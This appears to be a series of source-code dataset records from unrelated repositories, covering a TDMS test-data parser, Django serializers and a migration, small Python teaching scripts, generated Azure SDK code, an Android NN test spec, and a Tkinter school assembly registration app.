    [min_time_points, min_channels, min_num_shots, num_landmarks,
     num_PCA_comps, shot_type, union_type, infer_channel_units,
     infer_time_units].
    """
    # Shot type: sprytron takes precedence over overvoltage (matching
    # the order the flags were originally checked in).
    if arguments.sprytron:
        shot_type = 'Sprytron'
    elif arguments.overvoltage:
        shot_type = 'Overvoltage'
    else:
        shot_type = 'General'

    union_type = 'Intersection' if arguments.intersection else 'Union'

    return [arguments.min_time_points, arguments.min_channels,
            arguments.min_num_shots, arguments.num_landmarks,
            arguments.num_PCA_comps,
            shot_type, union_type,
            not arguments.do_not_infer_channel_units,
            not arguments.do_not_infer_time_units]
# check dac tdms parser parameters
def check_parms(arguments, parms):
    """Validate the DAC TDMS parser parameter list.

    Collects one error message per invalid entry, then applies the
    --num-landmarks / --num-PCA-comps override: when num_landmarks was
    given, parms[4] is set to False; otherwise parms[4] is True and
    parms[3] is replaced by num_PCA_comps.

    Returns (parms, message) where *message* is the newline-joined
    error text ("" when everything validated).
    """
    errors = []

    # parms[0]: minimum number of time points per channel.
    if parms[0] < 2:
        errors.append(
            "Each channel must have at least two values. "
            "Please use a larger value for min-time-points and try again.")

    # parms[1]: minimum number of channels per test.
    if parms[1] < 1:
        errors.append(
            "Each test must have at least one channel. "
            "Please use a larger value for min-channels and try again.")

    # parms[2]: minimum number of shots (0 means "every shot").
    if parms[2] < 0:
        errors.append(
            "Each channel must occur in at least one channel "
            "(use 0 to indicate every channel). Please use a non-negative value "
            "for min-num-shots and try again.")

    # parms[3]: number of landmarks (None = unset, 0 = no landmarks).
    if parms[3] is not None and parms[3] != 0 and parms[3] < 3:
        errors.append(
            "Number of landmarks must be zero or >= 3. Please "
            "provide a valid number of landmarks and try again.")

    # parms[4]: number of PCA components.
    if parms[4] < 2:
        errors.append(
            "Number of PCA components must be >= 2. Please provide "
            "a valid number of PCA components and try again.")

    # parms[5]: expected shot data type.
    if parms[5] not in ("General", "Overvoltage", "Sprytron"):
        errors.append(
            'Expected data type must be one of "General", '
            '"Overvoltage" or "Sprytron". Please use one of those options '
            'and try again.')

    # parms[6]: method for combining mismatched time steps.
    if parms[6] not in ("Union", "Intersection"):
        errors.append(
            'Available methods for combining mismatched, '
            'time points are "Union" and "Intersection". Please use one of those options '
            'and try again.')

    # --num-landmarks over-rides --num-PCA-comps: reuse parms[4] as a
    # "use PCA" flag and, when no landmarks were given, carry the PCA
    # component count in parms[3].
    if arguments.num_landmarks is not None:
        parms[4] = False
    else:
        parms[4] = True
        parms[3] = arguments.num_PCA_comps

    return parms, "\n".join(errors)
# parse test data subdirectory
def parse_run_chart(run_chart):
    """Split a run-chart directory name of the form
    "part_lot_batch_serial" into its four identifiers.

    Returns the list [part, lot, batch, serial], or None when the name
    does not contain exactly four "_"-separated fields.
    """
    fields = run_chart.split("_")
    if len(fields) != 4:
        return None
    return fields
# enumerate tdms files based on command line inputs
# TDMS_MATCHES gives a list of TDMS file type for filtering
def catalog_tdms_files (arguments, log, TDMS_MATCHES):
    """Enumerate TDMS files for the part number requested on the command line.

    Walks arguments.input_data_dir for subdirectories matching
    arguments.part_num_match, then each "Test Data"/<part_lot_batch_serial>
    run-chart directory beneath them, collecting .tdms files whose names
    contain one of the match strings and start with the run chart's
    part_lot_batch_serial prefix.

    Parameters:
        arguments: parsed command-line namespace (input_data_dir,
            part_num_match, tdms_file_matches).
        log: callable taking a single message string, used for progress
            and skip reporting.
        TDMS_MATCHES: default list of TDMS file-type match strings, used
            when --tdms-file-matches was not supplied.

    Returns a list of dicts with keys "part", "lot", "batch", "sn",
    "source", "tdms_files", "tdms_types".

    Raises TDMSUploadError when the input directory is missing, no part
    subdirectories match, a part has no data subdirectories, or no TDMS
    files survive the filters.
    """
    # gather data directories for given part number
    root_dir = arguments.input_data_dir
    part_num_match = arguments.part_num_match
    # check that root dir exists
    if not os.path.isdir(root_dir):
        raise TDMSUploadError("Input data directory does not exist. Please provide " +
                              "a different directory and try again.")
    # look for directories containing data for part number provided
    root_subdirs = os.listdir(root_dir)
    part_subdirs = fnmatch.filter(root_subdirs, part_num_match)
    # are there any subdirectories?
    if len(part_subdirs) == 0:
        raise TDMSUploadError('Could not find any subdirectories for part number matching "' +
                              part_num_match + '".')
    # put subdirectories in order
    part_subdirs.sort()
    # get list of .tdms file matches
    tdms_matches = TDMS_MATCHES
    if arguments.tdms_file_matches is not None:
        tdms_matches = arguments.tdms_file_matches
        # underscores in command-line match strings stand for spaces
        tdms_matches = [file_match.replace('_', ' ') for file_match in tdms_matches]
    # report on tdms file being used
    log("Using .tdms file matches in: " + str(tdms_matches))
    # look through each subdirectory for run chart data
    metadata = []
    for subdir in part_subdirs:
        # look for test data directory
        test_data_dir = os.path.join(root_dir, subdir, 'Test Data')
        # skip if run_chart_dir is not an actual directory
        if not os.path.isdir(test_data_dir):
            log('Skipping "' + test_data_dir + '" because it''s not a directory.')
            continue
        # each of the subdirectories of run_chart_dir will be a row in the
        # metadata table for the run chart model
        possible_run_chart_dirs = os.listdir(test_data_dir)
        # sort according to data ids
        possible_run_chart_dirs.sort()
        # check that we found data directories
        if len(possible_run_chart_dirs) == 0:
            raise TDMSUploadError('No data subdirectories found for part number match "' +
                                  part_num_match + '".')
        # check that data directories conform to expected format
        for run_chart_dir in possible_run_chart_dirs:
            # check that directory is expected format for a run chart
            run_chart_ids = parse_run_chart(run_chart_dir)
            # if it's not a run chart then skip it
            if run_chart_ids is None:
                log('Skipping run chart subdirectory "' + run_chart_dir +
                    '" because it does not conform to "part_lot_batch_serial" string format.')
                continue
            # find .tdms files in run chart directory
            run_chart_files = os.listdir(os.path.join(test_data_dir, run_chart_dir))
            run_chart_tdms_files = [run_chart_file for run_chart_file in run_chart_files
                                    if run_chart_file.endswith('.tdms')]
            # check that we have .tdms files
            if len(run_chart_tdms_files) == 0:
                log ('Skipping subdirectory "' + run_chart_ids[0] + '" -- does not ' +
                     'contain any TDMS files.')
                continue
            # screen for .tdms files according to argument parameters
            run_chart_tdms_matches = []
            run_chart_tdms_types = []
            for run_chart_file in run_chart_tdms_files:
                for match in tdms_matches:
                    if match in run_chart_file:
                        # check that .tdms file has matching part_lot_batch_sn
                        if not run_chart_file.startswith(
                            run_chart_ids[0] + "_" +
                            run_chart_ids[1] + "_" +
                            run_chart_ids[2] + "_" +
                            run_chart_ids[3]):
                            continue
                        # keep track of files and types
                        run_chart_tdms_types.append(match)
                        run_chart_tdms_matches.append(run_chart_file)
            # check that we have matching .tdms files
            if len(run_chart_tdms_matches) == 0:
                log ('Skipping subdirectory "' + run_chart_ids[0] + '" -- does not ' +
                     'contain any TDMS files with file matches.')
                continue
            # store in metadata structure
            metadata.append({"part": run_chart_ids[0],
                             "lot": run_chart_ids[1],
                             "batch": run_chart_ids[2],
                             "sn": run_chart_ids[3],
                             "source": os.path.join(os.path.abspath(test_data_dir),
                                                    run_chart_dir),
                             "tdms_files": run_chart_tdms_matches,
                             "tdms_types": run_chart_tdms_types})
    # check that files were found
    if metadata == []:
        raise TDMSUploadError("No TDMS files matching selection criterion were found.")
    return metadata
| [
"smartin@sandia.gov"
] | smartin@sandia.gov |
3c5b287ba292013072af0952810ed48c30cfb9e9 | 95341c85a8a116dba0d77644360ccfb346ceeb80 | /src/api-engine/api/routes/node/serializers.py | 9d954df567d1319bff4f28d77173fa89c21c0968 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | kuochunchang/cello | 109204905a6be17c47b6aa3268ee4bbfeadce43a | 1f778cea3a2021aabadd48e41cdd69ed1f8e979c | refs/heads/master | 2020-06-03T05:42:43.108481 | 2019-05-28T13:45:05 | 2019-05-28T13:45:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,661 | py | #
# SPDX-License-Identifier: Apache-2.0
#
import logging
from rest_framework import serializers
from api.common.enums import (
Operation,
NetworkType,
FabricNodeType,
FabricVersions,
HostType,
)
from api.common.serializers import PageQuerySerializer
from api.models import Node
LOG = logging.getLogger(__name__)
class NodeQuery(PageQuerySerializer, serializers.ModelSerializer):
    """Query parameters accepted when listing nodes (pagination plus
    optional node filters)."""
    # Optional filter by owning agent; per the help text, only an
    # operator may supply this field.
    agent_id = serializers.UUIDField(
        help_text="Agent ID, only operator can use this field",
        required=False,
        allow_null=True,
    )
    class Meta:
        model = Node
        fields = (
            "page",
            "per_page",
            "type",
            "name",
            "network_type",
            "network_version",
            "agent_id",
        )
        # "type" is mandatory on the model; relax it for query usage.
        extra_kwargs = {"type": {"required": False}}
class NodeIDSerializer(serializers.Serializer):
    """Minimal serializer exposing only a node's UUID."""
    id = serializers.UUIDField(help_text="ID of node")
class NodeInListSerializer(NodeIDSerializer, serializers.ModelSerializer):
    """Representation of one node row in a node-list response."""
    # Related agent/network, surfaced as plain UUIDs (nullable).
    agent_id = serializers.UUIDField(
        help_text="Agent ID", required=False, allow_null=True
    )
    network_id = serializers.UUIDField(
        help_text="Network ID", required=False, allow_null=True
    )
    class Meta:
        model = Node
        fields = (
            "id",
            "type",
            "name",
            "network_type",
            "network_version",
            "created_at",
            "agent_id",
            "network_id",
        )
        # id/created_at are normally read-only on the model; mark them
        # required and writable so list payloads can be validated.
        extra_kwargs = {
            "id": {"required": True, "read_only": False},
            "created_at": {"required": True, "read_only": False},
        }
class NodeListSerializer(serializers.Serializer):
    """Paginated node-list envelope: the rows plus a total count."""
    data = NodeInListSerializer(many=True, help_text="Nodes list")
    total = serializers.IntegerField(
        help_text="Total number of node", min_value=0
    )
class NodeCreateBody(serializers.ModelSerializer):
    """Request body for creating a node.

    Either ``agent_type`` or ``agent`` must be supplied; when both are
    present they must agree.  Fabric networks additionally require a
    known network version and node type.
    """

    agent_type = serializers.ChoiceField(
        help_text="Agent type",
        choices=HostType.to_choices(True),
        required=False,
    )

    class Meta:
        model = Node
        fields = (
            "network_type",
            "network_version",
            "type",
            "agent_type",
            "agent",
        )
        extra_kwargs = {
            "network_type": {"required": True},
            "network_version": {"required": True},
            "type": {"required": True},
        }

    def validate(self, attrs):
        """Cross-field validation of the creation payload."""
        network_type = attrs.get("network_type")
        # Fabric networks only accept known versions and node types.
        if network_type == NetworkType.Fabric.name.lower():
            if attrs.get("network_version") not in FabricVersions.values():
                raise serializers.ValidationError("Not valid fabric version")
            if attrs.get("type") not in FabricNodeType.names():
                raise serializers.ValidationError(
                    "Not valid node type for %s" % network_type
                )
        agent_type = attrs.get("agent_type")
        agent = attrs.get("agent")
        # At least one of agent_type / agent is required, and when both
        # are given they must describe the same agent type.
        if agent_type is None and agent is None:
            raise serializers.ValidationError("Please set agent_type or agent")
        if agent_type and agent and agent_type != agent.type:
            raise serializers.ValidationError(
                "agent type not equal to agent"
            )
        return attrs
class NodeOperationSerializer(serializers.Serializer):
    """Body for the node-operation endpoint: a single "action" choice."""
    action = serializers.ChoiceField(
        help_text=Operation.get_info("Operation for node:", list_str=True),
        choices=Operation.to_choices(True),
    )
| [
"hightall@me.com"
] | hightall@me.com |
26accc85bb295eeec34334972d717689820a06f2 | 1c822c0d49d7b67b0896c066958148a7b0731924 | /Basic_Concepts_of_String_Manipulation/First_day!.py | d6cff37297cfcb07407b916cacdfdf68deaf9adc | [
"MIT"
] | permissive | RKiddle/python_reg_expressions | 7e13a16475476c88543fde6dc55b53ec2fccbe37 | 9e89c1c59677ffa19a4c64a37e92bbea33fad88e | refs/heads/master | 2020-06-23T00:34:07.027628 | 2019-10-27T14:51:32 | 2019-10-27T14:51:32 | 198,446,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | # Find characters in movie variable
length_string = len(movie)
# Convert to string
to_string = str(length_string)
# Predefined variable
statement = "Number of characters in this review:"
# Concatenate strings and print result
print(statement + " " + to_string)
| [
"noreply@github.com"
] | noreply@github.com |
04967a4ffe67416e91dcdfacea1e59d437e7c886 | 28e7f0429e011a7be3da7fe2e1c5ee4cb0a5c4a9 | /profilepage/migrations/0009_hearts.py | 4e196d4d50dd5aeb05d8e8cc40a1ae160b7af8b9 | [] | no_license | Code-Institute-Submissions/adam181189-FriendsDiscovery_JulyResub | ff0c60e2c1d24898895984f3e308635c5b04237b | c0f21e633d84e49047b00ce5a42e9fe8b57801f5 | refs/heads/master | 2023-06-20T03:34:13.537413 | 2021-07-17T21:17:25 | 2021-07-17T21:17:25 | 388,078,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | # Generated by Django 3.2.3 on 2021-05-22 21:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Create the Hearts model: a directed "heart" sent between two users.

    Auto-generated by Django; the field order and dependencies are
    significant and must not be edited by hand.
    """
    # Depends on the user model (swappable) and the previous profilepage
    # migration.
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('profilepage', '0008_delete_friendlist'),
    ]
    operations = [
        migrations.CreateModel(
            name='Hearts',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
                ('from_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='heart_sent', to=settings.AUTH_USER_MODEL)),
                ('to_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='heart_received', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"adam181189@gmail.com"
] | adam181189@gmail.com |
7f3bb8b0f3ee8e09d8543a0fad022eb658cbf932 | 002bc333a1cbd4c629037d4cc0162844a29e342d | /book1/ch06/stack.py | 1a974f0deff0709865c9e38f1f0ee5f41c0dd5c1 | [
"MIT"
] | permissive | dragancvetic/py_training | 4c23a15e53852b2ce0eb48619757b1fe94648d67 | f27fa021e630fa16882a0438e009a73e11d9515b | refs/heads/master | 2016-08-05T11:06:21.816033 | 2015-08-23T20:57:57 | 2015-08-23T20:57:57 | 41,202,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | #!/usr/bin/env python
'''
An example of using list as a text stack
'''
stack=[]
def pushit():
    """Prompt for a string and push the stripped text onto the stack."""
    new_item = raw_input('Enter new string: ').strip()
    stack.append(new_item)
def popit():
if len(stack) == 0:
print "There is nothing in stack"
else:
stack.pop()
print 'Removed [', 'stack.pop()', ']'
def viewstack():
    # Print the whole stack list; the most recently pushed item is last.
    print stack
# Dispatch table mapping a menu letter to its handler function.
CMDs = {'u': pushit, 'o': popit, 'v': viewstack}
def showmenu():
    """Interactive menu loop: prompt for u/o/v/q and dispatch via CMDs.

    EOF or Ctrl-C while prompting is treated as 'q' (quit).
    """
    pr = """
    p(u)sh
    p(o)p
    (v)iew
    (q)uit
    Enter choice: """
    while True:
        # Inner loop: re-prompt until a valid single-letter choice is read.
        while True:
            try:
                choice = raw_input(pr).strip()[0].lower()
            except (EOFError, KeyboardInterrupt, IndexError):
                # Empty input (IndexError) or terminal EOF/interrupt quits.
                choice = 'q'
            print 'You picked option: {0}'.format(choice)
            if choice not in 'uovq':
                print 'Invalid option, try again'
            else:
                break
        if choice == 'q':
            break
        # Dispatch to the selected stack operation.
        CMDs[choice]()
# Run the interactive menu only when executed as a script.
if __name__ == '__main__':
    showmenu()
| [
"dragan.m.cvetic@gmail.com"
] | dragan.m.cvetic@gmail.com |
b8fe7ae8b85c3bcd71ac6f2dae28c73ba24a674b | d7016f69993570a1c55974582cda899ff70907ec | /sdk/containerregistry/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2019_04_01/aio/operations/_registries_operations.py | 96c7dd2ba66633f991630f8e2ddcd4c222a39f8a | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 10,664 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Optional, TypeVar, Union
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._registries_operations import build_get_build_source_upload_url_request, build_schedule_run_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RegistriesOperations:
"""RegistriesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerregistry.v2019_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _schedule_run_initial(
self,
resource_group_name: str,
registry_name: str,
run_request: "_models.RunRequest",
**kwargs: Any
) -> Optional["_models.Run"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.Run"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2019-04-01") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(run_request, 'RunRequest')
request = build_schedule_run_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._schedule_run_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_schedule_run_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/scheduleRun"} # type: ignore
@distributed_trace_async
async def begin_schedule_run(
self,
resource_group_name: str,
registry_name: str,
run_request: "_models.RunRequest",
**kwargs: Any
) -> AsyncLROPoller["_models.Run"]:
"""Schedules a new run based on the request parameters and add it to the run queue.
:param resource_group_name: The name of the resource group to which the container registry
belongs.
:type resource_group_name: str
:param registry_name: The name of the container registry.
:type registry_name: str
:param run_request: The parameters of a run that needs to scheduled.
:type run_request: ~azure.mgmt.containerregistry.v2019_04_01.models.RunRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either Run or the result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerregistry.v2019_04_01.models.Run]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2019-04-01") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._schedule_run_initial(
resource_group_name=resource_group_name,
registry_name=registry_name,
run_request=run_request,
api_version=api_version,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_schedule_run.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/scheduleRun"} # type: ignore
@distributed_trace_async
async def get_build_source_upload_url(
self,
resource_group_name: str,
registry_name: str,
**kwargs: Any
) -> "_models.SourceUploadDefinition":
"""Get the upload location for the user to be able to upload the source.
:param resource_group_name: The name of the resource group to which the container registry
belongs.
:type resource_group_name: str
:param registry_name: The name of the container registry.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SourceUploadDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_04_01.models.SourceUploadDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SourceUploadDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "2019-04-01") # type: str
request = build_get_build_source_upload_url_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
template_url=self.get_build_source_upload_url.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('SourceUploadDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_build_source_upload_url.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/listBuildSourceUploadUrl"} # type: ignore
| [
"noreply@github.com"
] | noreply@github.com |
7d1a9e35199da075a9e9b47dafc3b51e1f1c0ba8 | 2804432fba5a4fe639d07a207bb01f71e03d9189 | /test/cts/tool/CTSConverter/src/nn/specs/V1_2/argmax_1.mod.py | 6dc7430affa11a4f7cdba79b73c20f98a03f615b | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | intel/webml-polyfill | 5685299e1b6d91a010c5e057685bf010d5646e4f | bd014955c5bcc9dc5465aea06721072f45ab4a75 | refs/heads/master | 2023-09-01T17:30:55.961667 | 2023-04-14T01:18:47 | 2023-04-14T01:18:47 | 126,892,425 | 168 | 75 | Apache-2.0 | 2023-04-14T05:16:41 | 2018-03-26T21:31:32 | Python | UTF-8 | Python | false | false | 1,025 | py | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
input0 = Input("input0", "TENSOR_FLOAT32", "{2, 2}")
axis = Int32Scalar("axis", 1)
output0 = Output("output", "TENSOR_INT32", "{2}")
model = Model().Operation("ARGMAX", input0, axis).To(output0)
quant8 = DataTypeConverter().Identify({
input0: ["TENSOR_QUANT8_ASYMM", 1.0, 0],
})
Example({
input0: [1.0, 2.0,
4.0, 3.0],
output0: [1, 0],
}).AddVariations("relaxed", "float16", "int32", quant8)
| [
"yanx.cui@intel.com"
] | yanx.cui@intel.com |
c10b64b68a73422fbdf6966007bc2b99cc7da702 | 633088a6c9f0248585b1e90d7857f57a76776906 | /aspire-assembly-app.py | 4d462da48dc35542cd63ba9b4105e0bb135aed5d | [
"Unlicense"
] | permissive | wmfgrey/assembly | 12e351b846247a55fcea692fa8b9a04898252888 | db72d2b09064447807ff37b678124e649ee704e2 | refs/heads/master | 2020-04-09T18:25:02.802949 | 2018-12-05T12:00:58 | 2018-12-05T12:00:58 | 160,511,488 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,524 | py |
# Aspire Assembly Registration App
# Will Grey
# 23/11/2018
import base64
import sqlite3
from tkinter import *
import datetime
import hashlib
import csv
class Db():
def __init__(self):
self.openDb()
self.db.execute("""CREATE TABLE IF NOT EXISTS students
(studentID INTEGER PRIMARY KEY,
surname TEXT,
firstname TEXT,
groupID TEXT,
year INTEGER,
rfid TEXT,
last_registration INTEGER)""")
self.closeDb()
def openDb(self):
try:
self.conn = sqlite3.connect('assembly-app.db')
self.db = self.conn.cursor()
except:
print("Cannot open or create database file")
def closeDb(self):
self.conn.commit()
self.conn.close()
class Help():
def help(self):
comment=("Take Register:\t\tRun this while register is open. \n\n"
"Create Register: \t\tThis will create an attendance_date.csv file\n"
"\t\t\twhere date is the current date.\n"
"\t\t\tFormat: surname, firstname, group, year, '/ or N'\n\n"
"Export Students: \t\tThis will export a list of students\n"
"\t\t\tinto a file called students.csv\n\n"
"Import Students: \t\tThis will import a list of students\n"
"\t\t\tinto a file called students.csv\n"
"\t\t\tThe file is in the form: \n \t\t\tsurname, firstname, group, year, rfid\n"
"\t\t\tIf RFID is unavailable enter NULL\n\n"
"Add Student: \t\tAdd students to database.\n\n"
"Remove Student: \tRemove students from database.\n"
"\t\t\tTo update a student record first remove the \n"
"\t\t\tstudent then add the student again with the\n"
"\t\t\tupdated details.\n\n"
"Update Student RFID: \tUpdate student RFID in database.\n\n"
"End of Year Update: \tRemoves all Year 13 from database\n"
"\t\t\tand updates Year 12 students to Year 13.\n"
"\t\t\tWARNING: THIS MAKES SUBSTANTIAL CHANGES\n"
"\t\t\tTO THE DATABASE THAT CANNOT BE RECOVERED\n\n"
"Help: \t\t\tDisplay this help menu\n\n"
"Exit: \t \t\tQuit application")
self.help_window = Toplevel()
self.help_window.wm_title("Help")
self.help_window.geometry("450x580")
self.help_window.resizable(False, False)
self.help_window.configure(background="white")
Label( self.help_window,text="Help", font=("Helvetica",18), background="white").pack()
Label( self.help_window, text=comment, bg="white",justify=LEFT).pack(side="top", fill="both", expand=True, padx=10, pady=10)
Button( self.help_window,text="Close",background="white",command=self.help_window.destroy).pack()
class UpdateStudents(Db):
def list_students(self):
self.openDb()
self.db.execute("SELECT surname, firstname, groupID FROM students ORDER BY surname")
all_rows = self.db.fetchall()
self.students=[]
for row in all_rows:
self.students.append(row[0] + " " + row[1] + " " + row[2])
self.closeDb()
self.update_students_win()
def update_students_win(self):
add_win = Toplevel()
add_win.wm_title("Update Students")
add_win.geometry("250x180")
add_win.resizable(False, False)
add_win.configure(background="white")
self.rfid= Entry(add_win,show="*")
self.st = StringVar(add_win)
self.st.set(self.students[0])
self.entryVal2=StringVar()
self.entryVal2.set("")
Label(add_win, text="Update Students", font=("Helvetica",16), bg="white").grid(row=1, column=1,columnspan=2)
Label(add_win, text="Student", font=("Helvetica",12), bg="white").grid(row=2,column=1)
o=OptionMenu(add_win, self.st, *self.students)
o.configure(background="white")
o.grid(row=2,column=2)
Label(add_win, text="RFID", font=("Helvetica",12), bg="white").grid(row=3,column=1)
self.rfid.grid(row=3,column=2)
Label(add_win, textvariable=self.entryVal2, bg="white").grid(row=4,column=1,columnspan=2)
Button(add_win,text="Update Student RFID",background="white",command=self.update_students_sql).grid(row=5,column=1,columnspan=2)
Button(add_win,text="Close",background="white",command=add_win.destroy).grid(row=6,column=1,columnspan=2)
def update_students_sql(self):
hashed_rfid=hashlib.md5(str(self.rfid.get()).encode('utf-8')).hexdigest()
print(self.st.get(),hashed_rfid)
a=self.st.get().split()
self.entryVal2.set("Updated RFID of "+ self.st.get())
self.openDb()
self.db.execute("UPDATE students SET rfid=? WHERE surname=? AND firstname=? AND groupID=?",(hashed_rfid,a[0],a[1],a[2]))
self.closeDb()
self.rfid.delete(0, END)
self.rfid.insert(0, "")
class ImportStudents(Db):
def import_students(self):
self.w = Toplevel()
self.w.wm_title("Import Students")
self.w.geometry("150x100")
self.w.configure(background="white")
self.w.resizable(False, False)
Label(self.w, text="Import Students", font=("Helvetica",16), bg="white").pack()
Button(self.w,text="Select CSV file",background="white",command=self.import_csv_file).pack()
Button(self.w,text="Exit",background="white",command=self.w.destroy).pack()
def import_csv_file(self):
self.csv_file=filedialog.askopenfilename()
self.read_csv_file()
self.add_records_to_db()
def read_csv_file(self):
self.l=[]
file=open(self.csv_file)
r=csv.reader(file)
self.num=0
for i in r:
self.l.append(i)
self.num=self.num+1
file.close()
# print( self.l)
